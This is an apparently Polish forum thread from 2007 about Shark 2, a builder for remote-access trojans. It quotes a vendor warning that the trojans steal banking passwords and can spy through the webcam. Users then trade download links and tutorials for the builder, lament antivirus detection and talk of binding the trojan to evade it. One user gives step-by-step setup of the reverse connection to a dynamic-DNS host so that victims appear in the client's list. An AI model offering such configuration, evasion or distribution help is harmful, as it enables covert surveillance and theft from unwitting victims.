Shark 2 - ostatnio o nim glosno.

[grafi]

"Laboratorium Panda odkryło program do tworzenia koni trojańskich - Shark 2, który jest rozpowszechniany na kilku forach internetowych. Program występuje już w kilku wersjach 2.1 2.2 oraz 2.3
Konie trojańskie stworzone przy użyciu programu są przeznaczone do kradzieży wszystkich poufnych informacji z komputera ofiary, od typu procesora, poprzez zainstalowane programy aż do haseł bankowych, co więcej osoba kontrolująca trojana może w każdej chwili uruchomić kamerę internetową na przejętej maszynie i podglądać nieświadomego użytkownika. Jest to kolejny krok w ewolucji tego typu oprogramowania i bardzo mocno ingeruje w prywatność ofiary ataku.

Głównym zagrożeniem, które stwarza program jest to iż pozwala on na tworzenie złośliwego oprogramowania przez osoby, które nie posiadają zbyt dużej wiedzy w tej dziedzinie."

Zrodlo: www.komunikatory.pl, www.securityzone.one.pl/blog

Dosyc ciekawy trojan

, pobrac mozecie go tu www.s1awno.yoyo.pl/shark-2/

 

[3rr0rx]

No cóż, trojan jak trojan

@soft czysty bo sprawdziłem.

 

[b.]

Z wykrywalnoscia miernie, bo nod juz krzyczy

 

[grafi]

Nom niestety

, ale podobno nowa wersja ma wyjsc

.

 

[malinka]

wyszla i kaspersky krzyczy

 

[exe_cutor]

tu jest link do najnowszej wersji
http://shark-project.net/index.php?content=3

tylko cos nie za bardzo chce mi dzialac ten serwer - pewnie cos zle konfiguruje :/
ma moze ktos z was FAQ po polsku do tego prog??

 

[niekowalski]

" Unable to open port for SIN Console. "
takie coś mi wyskakuje przy próbie odpalenia , a może on tylko serwera instaluje nam w systemie ???
działa to wogule komuś ??

 

[exe_cutor]

sciagnasz sharK 2.4.0 fwb+ (Newest Version)?
ja to normalnie pobralem, wygenerowalem serwer (tylko chyba zle) i szukam pomocy jak to dobrze zrobic

 

[malinka]

nie rozumiem problemu
odpalasz klienta w ustawieniach podajesz swoje haslo i nr portu, pozniej generujesz server, podajesz taki sam port jak w kliencie i haslo, no i oczywiscie dane do reverse connection. dziala jak marzenie, jest swietny multum mozliwosci, szkoda tylko ze tak bardzo wykrywalny

 

[exe_cutor]

a w SIN-DNS-Adresses ma byc nr IP i port ofiary?
moze masz troche czasu na zrobienie jakiegos tutorialu o sharku? <prosi> =]

 

[malinka]

SIN-DNS-Adresses to dane do twojego revers connection
tzn musisz zalozyc jakies konto na dyndns, no-ip lub czyms podobnym, uruchamiasz klienta tej uslugi ktory caly czas atualizuje twoje zmienne ip i wlasnie o ten adres chodzi w SIN-DNS-Adresses. krotko mowiac musisz podac w serverze z kim ma sie polaczyc np. blablabla.no-ip.com lub inny ty to ustalasz. a klient tej uslugi ma za zadadnie zawsze skierowac polaczenie wlasnie do ciebie. jezeli masz stale ip nie polecam takich trojankow jestes jak na patelni

w przypadku nat nie wiem jak sobie poradzic podjezewam, ze trzeba trzeba bedzie ustawic porty na serverze ale moze sie myle.
ps w tego typu trojanach nie ma listy serverow, sever poja wi sie na liscie jezeli jest odpalony u ofiary, poza tym wystarczy jeden sever bo kazdy ma inne polaczenie wiec pojawi ci sie lista ofiar i wszystko bedzie ok.

 

[Eathes]

A na jakiej podstawie dziala ten trojan?>
Tzn kilka pytan ;

1. Jak on działa?
- Wysyłam wrogowi plik i co?
- Gdzie są do niego opcje?
2. Czy moze to byc siec hamachi?

 

[lee99]

Witam
Kolejna ciekawa zabawka

hehe

 

[Mavlinux]

Bardzo ciekawe ...

A moze ktos wie jak zarzadza cie ta zabawka ?

I kolejna sprawa , takie male pytanie . Moze mi ktos powiedziec jak korzystac z programu Brutus_2006 ?

http://shark-project.net/index.php?content=4

 

[Jaco_cc]

Szkoda że jest tak bardzo wykrywalny ;/ Ale czymś się go zbinduje i będzie mniej ;]
Tylko nie wiem za bardzo jak się nim obsługiwać ;/ Mógłby ktoś napisać jakiegoś użytecznego tutoriala?

 

[malinka]

Czy znane jest wam słowo "indolencja" ? jeżeli nie to zacznijcie od zgłębienia jego sensu i istoty a potem całkiem śmiało i bez obaw możecie już korzystać z tego link. To nie złośliwość lecz prośba o niezadawanie głupich pytań, problem konfiguracji połączenia jest wyjaśniony wyżej co do reszty jak chcesz spróbuj sam się dowiesz.

 

[lade]

dajcie uploada bo link niedziala. chce zobaczyc to szumnie i przesadnie nazywane przez prase mega niebezpiecznym trojanem i zaawansowanym ofcourse ;]

"wyznacza początek nowego etapu w rozwoju przestępczości online – mówi Piotr Walas, dyrektor techniczny Panda Software Polska. Aby zostać cyberprzestępcą nie trzeba już znać się na technikach komputerowych, co może prowadzić do eskalacji ataków wymierzonych w prywatność internautów – wyjaśnia Walas."[/b]

Chce go porownac z innymi slawami jak wspomagacz czynasty ;]

[ Dodano: 01-09-2007, 16:48 ]
Czy to dziala tylko w LAN? Na jakim protokole?

 

[exe_cutor]

http://rapidshare.com/files/49873243/sharK...AhBkDdS.zip.htm - link do shark 2.4.0

http://pl.youtube.com/watch?v=u8XNP6fFhnk - tutorial po hiszpansku :/ (niezbyt dobrze sie go oglada)

http://pl.youtube.com/watch?v=YfqXGlqM5pM - tutorial do shark 2.3.2 (kiepska jakosc obrazu, jezyk ang)

http://rapidshare.com/files/52731493/Shark...manual.doc.html - tutorial do 2.4.0 zrobiony w wordzie (hiszpanski)

alez te GOOGLE sa potezne

mam nadzieje ze to komus pomoze - ja niestety nie zrobilem z tego zbyt dobrego uzytku

ucieszylbym sie gdyby ktos mi wytlumaczyl na gg lub zrobil jakis tutorial z prawdziwego zdarzenia i w naszym pieknym jezyku (polskim) ;]

 

[neo11on]

Originally posted by exe_cutor
http://rapidshare.com/files/49873243/sharK...AhBkDdS.zip.htm - link do shark 2.4.0

http://pl.youtube.com/watch?v=u8XNP6fFhnk - tutorial po hiszpansku :/ (niezbyt dobrze sie go oglada)

http://pl.youtube.com/watch?v=YfqXGlqM5pM - tutorial do shark 2.3.2 (kiepska jakosc obrazu, jezyk ang)

http://rapidshare.com/files/52731493/Shark...manual.doc.html - tutorial do 2.4.0 zrobiony w wordzie (hiszpanski)

alez te GOOGLE sa potezne

mam nadzieje ze to komus pomoze - ja niestety nie zrobilem z tego zbyt dobrego uzytku

ucieszylbym sie gdyby ktos mi wytlumaczyl na gg lub zrobil jakis tutorial z prawdziwego zdarzenia i w naszym pieknym jezyku (polskim) ;]

spoko a jakie jest hasełko do tego ostatniego tutoriala????????

 

[AxelYork]

heh shark nie ma w sobie nic ciekawego z wyjatkiem opcji reagowania na określone procesy jak np wyłaczenie sie jesli NOD aktywny są inne o wile lepsze revers conection trojany wystarczy poszukać może niedługo zrobię jakiś turtial z jednym z nich...